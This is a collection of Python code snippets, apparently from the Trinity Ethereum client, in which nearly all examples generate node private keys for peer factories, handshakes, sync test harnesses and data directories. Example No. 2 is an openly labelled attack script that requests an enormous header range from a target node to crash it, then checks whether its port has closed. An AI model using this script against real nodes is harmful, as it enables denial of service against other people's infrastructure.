Example No. 1
async def _setup_alice_and_bob_factories(alice_chain_db, bob_chain_db):
    cancel_token = CancelToken(
        'trinity.get_directly_linked_peers_without_handshake')

    #
    # Alice
    #
    alice_context = BeaconContext(
        chain_db=alice_chain_db,
        network_id=1,
    )

    alice_factory = BCCPeerFactory(
        privkey=ecies.generate_privkey(),
        context=alice_context,
        token=cancel_token,
    )

    #
    # Bob
    #
    bob_context = BeaconContext(
        chain_db=bob_chain_db,
        network_id=1,
    )

    bob_factory = BCCPeerFactory(
        privkey=ecies.generate_privkey(),
        context=bob_context,
        token=cancel_token,
    )

    return alice_factory, bob_factory
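
These factories are typically handed to a helper such as get_directly_linked_peers_without_handshake (see Example No. 20 below). A hedged sketch of that glue; the wrapper name here is an illustrative assumption, not part of the original snippet:

async def _get_directly_linked_bcc_peers(alice_chain_db, bob_chain_db):
    # Build the two BCC peer factories defined above, then let the generic
    # helper wire them together over an in-memory transport pair.
    alice_factory, bob_factory = await _setup_alice_and_bob_factories(
        alice_chain_db, bob_chain_db)
    return await get_directly_linked_peers_without_handshake(
        alice_factory=alice_factory,
        bob_factory=bob_factory,
    )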
Example No. 2
def _exp(node_url, chain) -> None:

    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.memory import MemoryDB
    from tests.p2p.integration_test_helpers import FakeAsyncHeaderDB, connect_to_peers_loop

    ip, port = node_url.split('@')[1].split(':')
    if port_probe(ip, port):
        print('The port is open, starting to attack...')
    peer_class = LESPeer
    peer_pool = None
    if chain == 'mainnet':
        block_hash = '0xd4e56740f876aef8c010b86a40d5f56745a118d0906a34e69aec8c0db1cb8fa3'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(MAINNET_GENESIS_HEADER)
        network_id = MainnetChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             MAINNET_VM_CONFIGURATION)
    elif chain == 'testnet':
        block_hash = '0x41941023680923e0fe4d74a34bdac8141f2540e3ae90623718e47d66d1ca4a2d'
        headerdb = FakeAsyncHeaderDB(MemoryDB())
        headerdb.persist_header(ROPSTEN_GENESIS_HEADER)
        network_id = RopstenChain.network_id
        nodes = [Node.from_uri(node_url)]
        peer_pool = PeerPool(peer_class, headerdb, network_id,
                             ecies.generate_privkey(),
                             ROPSTEN_VM_CONFIGURATION)
    loop = asyncio.get_event_loop()

    async def attack() -> None:
        nonlocal peer_pool
        nonlocal block_hash
        while not peer_pool.peers:
            print("Waiting for peer connection...")
            await asyncio.sleep(1)
        peer = cast(LESPeer, peer_pool.peers[0])
        cmd = GetBlockHeaders(peer.sub_proto.cmd_id_offset)
        data = {
            'request_id': 1,
            'query': GetBlockHeadersQuery(
                decode_hex(block_hash), 1, 0xffffffffffffffff, False),
        }
        header, body = cmd.encode(data)
        peer.sub_proto.send(header, body)
        await asyncio.sleep(1)
        result = port_probe(ip, port)
        if not result:
            print('The port is closed, attack succeeded...')
            exit()

    t1 = asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    t2 = asyncio.ensure_future(attack())
    loop.set_debug(True)
    loop.run_until_complete(asyncio.wait([t1, t2]))
    loop.close()
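
port_probe is referenced above but not defined in the snippet; a plausible stand-in (an assumption, not the original implementation) is a plain TCP connect check:

import socket

def port_probe(ip: str, port: str, timeout: float = 2.0) -> bool:
    # Return True if a TCP connection to ip:port can be established.
    try:
        with socket.create_connection((ip, int(port)), timeout=timeout):
            return True
    except OSError:
        return False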
Example No. 3
def test_encrypt_decrypt():
    msg = b'test yeah'
    privkey = ecies.generate_privkey()
    ciphertext = ecies.encrypt(msg, privkey.public_key)
    decrypted = ecies.decrypt(ciphertext, privkey)
    assert decrypted == msg

    privkey2 = ecies.generate_privkey()
    with pytest.raises(ecies.DecryptionError):
        decrypted = ecies.decrypt(ciphertext, privkey2)
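
The generated key is an eth_keys PrivateKey, so it round-trips through its raw 32-byte form; a minimal sketch, assuming Trinity's p2p.ecies and eth-keys are installed:

from eth_keys import keys
from p2p import ecies

privkey = ecies.generate_privkey()
assert isinstance(privkey, keys.PrivateKey)

# Serialize and restore the key, as the nodekey persistence examples below do.
restored = keys.PrivateKey(privkey.to_bytes())
assert restored == privkey
assert restored.public_key == privkey.public_key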
Example No. 4
    def __init__(self, remote: kademlia.Node, privkey: datatypes.PrivateKey,
                 use_eip8: bool, token: CancelToken) -> None:
        self.remote = remote
        self.privkey = privkey
        self.ephemeral_privkey = ecies.generate_privkey()
        self.use_eip8 = use_eip8
        self.cancel_token = token
Example No. 5
def initialize_data_dir(chain_config: ChainConfig) -> None:
    if not chain_config.data_dir.exists() and is_under_xdg_trinity_root(
            chain_config.data_dir):
        chain_config.data_dir.mkdir(parents=True, exist_ok=True)
    elif not chain_config.data_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base chain directory provided does not exist: `{0}`".format(
                chain_config.data_dir, ), chain_config.data_dir)

    # Logfile
    if (not chain_config.logdir_path.exists()
            and is_under_xdg_trinity_root(chain_config.logdir_path)):

        chain_config.logdir_path.mkdir(parents=True, exist_ok=True)
        chain_config.logfile_path.touch()
    elif not chain_config.logdir_path.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base logging directory provided does not exist: `{0}`".format(
                chain_config.logdir_path, ), chain_config.logdir_path)

    # Chain data-dir
    os.makedirs(chain_config.database_dir, exist_ok=True)

    # Nodekey
    if chain_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(chain_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
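
The inverse operation, loading the persisted nodekey, is not shown in these examples; a minimal sketch using the eth-keys API (not Trinity's actual config loader):

from pathlib import Path
from eth_keys import keys

def load_nodekey(nodekey_path: Path) -> keys.PrivateKey:
    # The file holds the raw 32-byte private key written by nodekey.to_bytes().
    return keys.PrivateKey(nodekey_path.read_bytes())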
Example No. 6
def initialize_data_dir(trinity_config: TrinityConfig) -> None:
    should_create_data_dir = (not trinity_config.data_dir.exists()
                              and is_under_path(
                                  trinity_config.trinity_root_dir,
                                  trinity_config.data_dir))
    if should_create_data_dir:
        trinity_config.data_dir.mkdir(parents=True, exist_ok=True)
    elif not trinity_config.data_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            f"The base chain directory provided does not exist: `{str(trinity_config.data_dir)}`",
            trinity_config.data_dir,
        )

    # Logfile
    should_create_logdir = (not trinity_config.logdir_path.exists()
                            and is_under_path(trinity_config.trinity_root_dir,
                                              trinity_config.logdir_path))
    if should_create_logdir:
        trinity_config.logdir_path.mkdir(parents=True, exist_ok=True)
        trinity_config.logfile_path.touch()
    elif not trinity_config.logdir_path.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            "The base logging directory provided does not exist: `{0}`".format(
                trinity_config.logdir_path, ), trinity_config.logdir_path)

    # Chain data-dir
    os.makedirs(trinity_config.database_dir, exist_ok=True)

    # Nodekey
    if trinity_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(trinity_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
Example No. 7
def _test() -> None:
    import argparse
    import asyncio
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from p2p import ecies
    from p2p.kademlia import Node
    from trinity.protocol.common.constants import DEFAULT_PREFERRED_NODES
    from trinity.protocol.common.context import ChainContext
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()

    context = ChainContext(headerdb=chaindb,
                           network_id=network_id,
                           vm_configuration=ROPSTEN_VM_CONFIGURATION)
    peer_pool = ETHPeerPool(privkey=privkey, context=context)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Example No. 8
def _test() -> None:
    import argparse
    import signal
    from eth.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from tests.trinity.core.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncLevelDB, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    db = FakeAsyncLevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(
        ETHPeer, chaindb, network_id, ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    peer_pool.run_task(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(chaindb, db, head.state_root, peer_pool)
    downloader.logger.setLevel(log_level)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    async def run() -> None:
        await downloader.run()
        downloader.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Example No. 9
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import ETHPeer, HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (FakeAsyncChainDB,
                                                    FakeAsyncRopstenChain,
                                                    LocalGethPeerPool)
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id, privkey)
    else:
        discovery = None
        peer_pool = HardCodedNodesPeerPool(
            ETHPeer,
            chaindb,
            RopstenChain.network_id,
            privkey,
            discovery,
        )
    asyncio.ensure_future(peer_pool.run())

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Example No. 10
def _test() -> None:
    import argparse
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(log_level)

    loop = asyncio.get_event_loop()
    # Use a ProcessPoolExecutor as the default because the tasks we want to offload from the main
    # thread are cpu intensive.
    loop.set_default_executor(ProcessPoolExecutor())
    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id, privkey)
    else:
        from p2p.peer import HardCodedNodesPeerPool
        min_peers = 5
        peer_pool = HardCodedNodesPeerPool(ETHPeer, chaindb,
                                           RopstenChain.network_id, privkey,
                                           min_peers)

    asyncio.ensure_future(peer_pool.run())
    downloader = ChainSyncer(chaindb, peer_pool)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        try:
            await downloader.run()
        except OperationCancelled:
            pass
        await peer_pool.stop()
        await downloader.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Example No. 11
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p import kademlia
    from p2p.constants import ROPSTEN_BOOTNODES
    from p2p.discovery import DiscoveryProtocol
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    loop = asyncio.get_event_loop()
    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    privkey = ecies.generate_privkey()
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey)
        discovery = None
    else:
        listen_host = '0.0.0.0'
        listen_port = 30303
        addr = kademlia.Address(listen_host, listen_port, listen_port)
        discovery = DiscoveryProtocol(privkey, addr, ROPSTEN_BOOTNODES)
        loop.run_until_complete(discovery.create_endpoint())
        print("Bootstrapping discovery service...")
        loop.run_until_complete(discovery.bootstrap())
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id, privkey, discovery)

    asyncio.ensure_future(peer_pool.run())
    downloader = ChainSyncer(chaindb, peer_pool)
    # On ROPSTEN the discovery table is usually full of bad peers so we can't require too many
    # peers in order to sync.
    downloader.min_peers_to_sync = 1

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()
        if discovery is not None:
            discovery.stop()
            # Give any pending discovery tasks some time to finish.
            await asyncio.sleep(2)

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Example No. 12
def _test() -> None:
    import argparse
    import signal
    from p2p import constants
    from p2p import ecies

    loop = asyncio.get_event_loop()
    loop.set_debug(True)

    parser = argparse.ArgumentParser()
    parser.add_argument('-bootnode',
                        type=str,
                        help="The enode to use as bootnode")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.basicConfig(level=log_level,
                        format='%(asctime)s %(levelname)s: %(message)s')

    listen_host = '127.0.0.1'
    # Listen on a port other than 30303 so that we can test against a local geth instance
    # running on that port.
    listen_port = 30304
    privkey = ecies.generate_privkey()
    addr = kademlia.Address(listen_host, listen_port, listen_port)
    if args.bootnode:
        bootstrap_nodes = tuple([kademlia.Node.from_uri(args.bootnode)])
    else:
        bootstrap_nodes = tuple(
            kademlia.Node.from_uri(enode)
            for enode in constants.ROPSTEN_BOOTNODES)
    discovery = DiscoveryProtocol(privkey, addr, bootstrap_nodes)
    loop.run_until_complete(
        loop.create_datagram_endpoint(lambda: discovery,
                                      local_addr=('0.0.0.0', listen_port)))

    async def run() -> None:
        try:
            await discovery.bootstrap()
            while True:
                await discovery.lookup_random(CancelToken("Unused"))
                print("====================================================")
                print("Random nodes: ",
                      list(discovery.get_nodes_to_connect(10)))
                print("====================================================")
        except OperationCancelled:
            await discovery.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, discovery.cancel_token.trigger)

    loop.run_until_complete(run())
    loop.close()
Example No. 13
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from evm.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, LocalGethPeerPool
    logging.basicConfig(level=logging.INFO,
                        format='%(levelname)s: %(message)s')
    logging.getLogger('p2p.chain.ChainSyncer').setLevel(logging.DEBUG)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-local-geth', action="store_true")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    if args.local_geth:
        peer_pool = LocalGethPeerPool(ETHPeer, chaindb,
                                      RopstenChain.network_id,
                                      ecies.generate_privkey())
    else:
        peer_pool = PeerPool(ETHPeer, chaindb, RopstenChain.network_id,
                             ecies.generate_privkey())
    asyncio.ensure_future(peer_pool.run())

    downloader = ChainSyncer(chaindb, peer_pool)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        await downloader.run()
        await peer_pool.stop()
        await downloader.stop()

    loop = asyncio.get_event_loop()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)
    loop.run_until_complete(run())
    loop.close()
Example No. 14
def _test():
    import argparse
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    discovery = None
    peer_pool = HardCodedNodesPeerPool(ETHPeer,
                                       chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey(),
                                       discovery,
                                       min_peers=5)
    asyncio.ensure_future(peer_pool.run())

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(downloader.run())
    loop.run_forever()
    loop.close()
Example No. 15
    def __init__(
            self, remote: NodeAPI, privkey: datatypes.PrivateKey, use_eip8: bool) -> None:
        if remote is None:
            raise ValidationError("Cannot create handshake with None remote")
        elif remote.address is None:
            raise ValidationError("Cannot create handshake with remote address=None")

        self.logger = get_logger("p2p.peer.Handshake")
        self.remote = remote
        self.privkey = privkey
        self.ephemeral_privkey = ecies.generate_privkey()
        self.use_eip8 = use_eip8
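
The ephemeral key generated here is what both sides feed into ECDH during the RLPx auth handshake; a hedged sketch of that symmetry, assuming p2p.ecies.ecdh_agree is available as in Trinity's ECIES module:

from p2p import ecies

initiator_ephemeral = ecies.generate_privkey()
responder_ephemeral = ecies.generate_privkey()

# Each side combines its own ephemeral private key with the peer's ephemeral
# public key and arrives at the same shared secret.
secret_a = ecies.ecdh_agree(initiator_ephemeral, responder_ephemeral.public_key)
secret_b = ecies.ecdh_agree(responder_ephemeral, initiator_ephemeral.public_key)
assert secret_a == secret_b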
Example No. 16
def _resolve_node_key(trinity_config: TrinityConfig,
                      nodekey_seed: Optional[str]) -> None:
    if nodekey_seed:
        private_key_bytes = hashlib.sha256(nodekey_seed.encode()).digest()
        nodekey = PrivateKey(private_key_bytes)
        trinity_config.nodekey = nodekey
        return

    if trinity_config.nodekey is None:
        nodekey = ecies.generate_privkey()
        with open(trinity_config.nodekey_path, 'wb') as nodekey_file:
            nodekey_file.write(nodekey.to_bytes())
        trinity_config.nodekey = nodekey
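
Deriving the key from a seed this way is deterministic, which is presumably the point of the seed option; an illustrative sketch (the helper name is hypothetical):

import hashlib
from eth_keys import keys

def nodekey_from_seed(seed: str) -> keys.PrivateKey:
    # Same seed -> same 32-byte digest -> same node key.
    return keys.PrivateKey(hashlib.sha256(seed.encode()).digest())

assert nodekey_from_seed("alice") == nodekey_from_seed("alice")
assert nodekey_from_seed("alice") != nodekey_from_seed("bob")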
Example No. 17
    def __init__(self, remote: NodeAPI, privkey: datatypes.PrivateKey,
                 use_eip8: bool, token: CancelToken) -> None:
        if remote is None:
            raise ValidationError("Cannot create handshake with None remote")
        elif remote.address is None:
            raise ValidationError(
                "Cannot create handshake with remote address=None")

        self.remote = remote
        self.privkey = privkey
        self.ephemeral_privkey = ecies.generate_privkey()
        self.use_eip8 = use_eip8
        self.cancel_token = token
Example No. 18
def _test():
    import argparse
    import asyncio
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import ETHPeer, DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, connect_to_peers_loop)
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    args = parser.parse_args()

    chaindb = FakeAsyncChainDB(LevelDB(args.db))
    chain = FakeAsyncRopstenChain(chaindb)
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(ETHPeer, chaindb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    syncer = FullNodeSyncer(chain, chaindb, chaindb.db, peer_pool)

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint():
        await sigint_received.wait()
        await syncer.cancel()
        await peer_pool.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(syncer.run())
    loop.run_forever()
    loop.close()
Example No. 19
def _test():
    import argparse
    from concurrent.futures import ProcessPoolExecutor
    import signal
    from p2p import ecies
    from p2p.peer import HardCodedNodesPeerPool
    from evm.chains.ropsten import RopstenChain
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    peer_pool = HardCodedNodesPeerPool(ETHPeer,
                                       chaindb,
                                       RopstenChain.network_id,
                                       ecies.generate_privkey(),
                                       min_peers=5)
    asyncio.ensure_future(peer_pool.run())

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()
    loop.set_default_executor(ProcessPoolExecutor())

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, downloader.cancel_token.trigger)

    async def run():
        # downloader.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and downloader.
        try:
            await downloader.run()
        except OperationCancelled:
            pass
        await peer_pool.stop()
        await downloader.stop()

    loop.run_until_complete(run())
    loop.close()
Example No. 20
async def get_directly_linked_peers_without_handshake(
        alice_factory: BasePeerFactory = None,
        bob_factory: BasePeerFactory = None) -> Tuple[BasePeer, BasePeer]:
    """
    See get_directly_linked_peers().

    Neither the P2P handshake nor the sub-protocol handshake will be performed here.
    """
    cancel_token = CancelToken("get_directly_linked_peers_without_handshake")

    if alice_factory is None:
        alice_factory = ParagonPeerFactory(
            privkey=ecies.generate_privkey(),
            context=ParagonContext(),
            token=cancel_token,
        )

    if bob_factory is None:
        bob_factory = ParagonPeerFactory(
            privkey=ecies.generate_privkey(),
            context=ParagonContext(),
            token=cancel_token,
        )

    alice_remote = NodeFactory(pubkey=alice_factory.privkey.public_key)
    bob_remote = NodeFactory(pubkey=bob_factory.privkey.public_key)

    alice_transport, bob_transport = MemoryTransportPairFactory(
        alice_remote=alice_remote,
        alice_private_key=alice_factory.privkey,
        bob_remote=bob_remote,
        bob_private_key=bob_factory.privkey,
    )

    alice = alice_factory.create_peer(alice_transport)
    bob = bob_factory.create_peer(bob_transport)

    return alice, bob
Example No. 21
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from evm.chains.ropsten import RopstenChain, ROPSTEN_VM_CONFIGURATION
    from evm.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import FakeAsyncChainDB, connect_to_peers_loop
    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s')

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG
    logging.getLogger('p2p.state.StateDownloader').setLevel(log_level)

    db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(db)
    network_id = RopstenChain.network_id
    nodes = DEFAULT_PREFERRED_NODES[network_id]
    peer_pool = PeerPool(ETHPeer, chaindb, network_id,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))

    head = chaindb.get_canonical_head()
    downloader = StateDownloader(db, head.state_root, peer_pool)
    loop = asyncio.get_event_loop()

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await downloader.cancel()
        loop.stop()

    loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(downloader.run())
    loop.run_forever()
    loop.close()
Example No. 22
def initialize_data_dir(trinity_config: TrinityConfig) -> None:
    should_create_data_dir = (
        not trinity_config.data_dir.exists() and
        is_under_path(trinity_config.trinity_root_dir, trinity_config.data_dir)
    )
    if should_create_data_dir:
        trinity_config.data_dir.mkdir(parents=True, exist_ok=True)
    elif not trinity_config.data_dir.exists():
        # we don't lazily create the base dir for non-default base directories.
        raise MissingPath(
            f"The base chain directory provided does not exist: `{str(trinity_config.data_dir)}`",
            trinity_config.data_dir,
        )

    # Logfile
    should_create_logdir = (
        not trinity_config.log_dir.exists() and
        (
            # If we're in the default path, always create the log directory
            is_under_path(trinity_config.trinity_root_dir, trinity_config.log_dir) or
            (
                # If we're in a custom path, create the log directory if the data dir is empty
